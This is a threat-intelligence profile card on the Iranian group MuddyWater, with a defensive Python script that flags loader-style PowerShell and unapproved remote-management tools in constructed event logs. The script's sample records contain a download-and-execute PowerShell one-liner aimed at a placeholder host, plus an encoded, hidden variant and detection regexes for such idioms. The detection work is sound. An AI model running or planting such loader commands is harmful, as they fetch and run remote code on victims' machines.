Threat Intelligence Tarot
swords · 14
Iran (MOIS - Ministry of Intelligence)
G0069 · ★★★★★
risk 3/5
✦ The Marsh ✦
MuddyWater
SeedWorm · TEMP.Zagros · Mercury · Mango Sandstorm · TA450
Turkey · Pakistan · Iraq · Israel · Saudi Arabia · Telecom · Government
Active since ~2017 · Middle East political intelligence, Espionage against Iran opponents, Regional government access
The Marsh does not operate alone - it is the Ministry of Intelligence's instrument across the Middle East, watching Turkey, threatening Israel, monitoring opposition. It moves through the region's political terrain like water through soft ground, taking the shape of whatever crack it finds.
Tactics & Techniques
- RCN · Reconnaissance
- RDV · Resource Development
- INI · Initial Access
- EXC · Execution
- PRS · Persistence
- PRV · Privilege Escalation
- EVA · Defense Evasion
- CRD · Credential Access
- DSC · Discovery
- LAT · Lateral Movement
- COL · Collection
- C2 · Command and Control
- EXF · Exfiltration
- IMP · Impact
Notable Operations
- ◆ Joint CISA advisory on Iranian MOIS-directed MuddyWater operations (AA22-055A, February 2022)
- ◆ Turkey government targeting via malicious Office documents
- ◆ Israeli and Saudi telecommunications targeting
- ◆ SimpleHelp and Atera remote access tool abuse
Defenses
- ▸ PowerShell logging (script block and module logging), AMSI, and constrained language mode (CIS Control 8)
- ▸ Remote monitoring and management tool allowlisting, so that only the organisation's sanctioned RMM agent may run (CIS Control 2)
- ▸ Email attachment sandboxing that detonates macro-enabled Office documents and handles lures written in regional languages (CIS Control 9)
- ▸ CISA Iran threat advisory monitoring and indicator integration (NIST CSF: DE.AE)
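The first two defenses above as a small triage pass over constructed Windows event records, written here as an added example that is not part of this card or of the MITRE ATT&CK data it draws on. It flags loader-style PowerShell seen in script-block logs (event 4104), decodes and inspects commands hidden behind `-EncodedCommand`, and reports RMM-looking binaries that are not on an allowlist. The host names, executable names, the `approvedrmm.exe` allowlist entry and the log records are all constructed for the example and are not real indicators; keyword matching on the vendor names the card lists (Atera, SimpleHelp) stands in for the publisher- or hash-based allowlist a real deployment would use.

```python
"""Added example: triage of constructed PowerShell and process-creation events
against two of the card's defenses (PowerShell logging, RMM allowlisting).
All names and records below are constructed for illustration."""
import base64
import re

# Constructed allowlist: the single RMM agent this hypothetical org sanctions.
APPROVED_RMM = {"approvedrmm.exe"}

# Vendor names the card lists as abused; matched against the image file name.
# Real executable names are an assumption, hence substring matching.
RMM_KEYWORDS = ("atera", "simplehelp")

# Loader-style PowerShell idioms worth a look in script-block content.
SUSPICIOUS_PS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|FromBase64String|"
    r"Net\.WebClient|Invoke-WebRequest|-EncodedCommand",
    re.IGNORECASE,
)

# -EncodedCommand / -enc / -e followed by a base64 blob (UTF-16LE script).
ENCODED_ARG = re.compile(
    r"(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_encoded_command(cmdline):
    """Return the decoded script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell(text):
    """Sorted, lower-cased list of loader idioms found in a script block or command."""
    return sorted({m.group(0).lower() for m in SUSPICIOUS_PS.finditer(text)})


def check_rmm(image):
    """Describe an RMM-looking binary that is not on the allowlist, else None."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name in APPROVED_RMM:
        return None
    if any(k in name for k in RMM_KEYWORDS):
        return f"unapproved RMM binary: {name}"
    return None


def triage(records):
    """Run both checks over event dicts; return (rule, host, detail) findings."""
    findings = []
    for r in records:
        if r["event"] == "ScriptBlockLogging":  # Microsoft-Windows-PowerShell 4104
            hits = check_powershell(r["ScriptBlockText"])
            if hits:
                findings.append(("ps_scriptblock", r["host"], ", ".join(hits)))
        elif r["event"] == "ProcessCreate":  # Sysmon 1 / Security 4688
            rmm = check_rmm(r["Image"])
            if rmm:
                findings.append(("rmm_allowlist", r["host"], rmm))
            decoded = decode_encoded_command(r["CommandLine"])
            if decoded is not None:
                hits = check_powershell(decoded)
                if hits:
                    findings.append(("ps_encoded", r["host"], ", ".join(hits)))
    return findings


def encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: one benign and one suspicious case per check.
SAMPLE_RECORDS = [
    {"event": "ScriptBlockLogging", "host": "ws01",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"event": "ScriptBlockLogging", "host": "ws02",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"event": "ProcessCreate", "host": "ws03",
     "Image": "C:\\Program Files\\ApprovedRMM\\approvedrmm.exe",
     "CommandLine": "approvedrmm.exe /svc"},
    {"event": "ProcessCreate", "host": "ws04",
     "Image": "C:\\Users\\Public\\AteraAgent.exe",
     "CommandLine": "AteraAgent.exe"},
    {"event": "ProcessCreate", "host": "ws05",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "Invoke-Expression([Text.Encoding]::UTF8.GetString("
         "[Convert]::FromBase64String('aGk=')))")},
]

if __name__ == "__main__":
    for rule, host, detail in triage(SAMPLE_RECORDS):
        print(f"{host}: {rule}: {detail}")
```

Run as a script it reports three findings (ws01, ws04, ws05) and stays silent on the benign records; in practice the same checks would be fed from a SIEM query rather than an inline list, and the allowlist keyed on signer or hash rather than file name.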
Reversed: Their Weakness
MuddyWater's broad geographic mandate and multiple concurrent campaigns created coordination challenges - its overlapping infrastructure and tool reuse across different regional targets helped researchers map the full scope of MOIS cyber operations.
Data sourced from MITRE ATT&CK. For educational purposes.